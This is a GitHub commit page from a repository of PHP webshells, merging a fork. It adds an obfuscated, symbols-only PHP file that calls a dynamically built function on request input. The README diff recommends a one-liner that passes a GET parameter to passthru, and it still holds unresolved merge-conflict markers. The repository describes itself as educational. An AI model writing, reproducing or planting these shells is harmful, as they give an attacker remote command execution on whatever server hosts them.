Skip to content

Commit 9e1b17d

Browse files
author
Richard Mahoney
committed
Sync with remote fork
2 parents b78bbf4 + e474a21 commit 9e1b17d

22 files changed

+346
-420
lines changed

Non-alphanumeric.php

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
2+
3+
$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_;
4+
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
5+
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
6+
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
7+
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
8+
$_=$
9+
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
10+
11+
?>
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.

README.md

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,37 @@
1+
Contributing
2+
============
3+
To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost).
4+
5+
6+
7+
18
php-webshells
29
=============
310

11+
<<<<<<< HEAD
412
Common PHP shells. Do not put these on a publicly-accessible webserver.
513

614
These are provided for education purposes only.
15+
=======
16+
Common php webshells. Do not host the file(s) in your server!
17+
18+
++++++++++++++++++++++++++
19+
20+
Though I recommend one-liners like
21+
22+
php echo passthru($_GET['cmd']); ?>
23+
24+
(Not a full fledged webshell, but works fine)
25+
26+
=================================================================
27+
28+
You can try WebHandler for one-liners.
29+
30+
WebHandler.py works for POST and GET requests:
31+
32+
33+
34+
35+
36+
37+
>>>>>>> e474a21202962d29bda156e5f384499d3b993645

0 commit comments

Comments
 (0)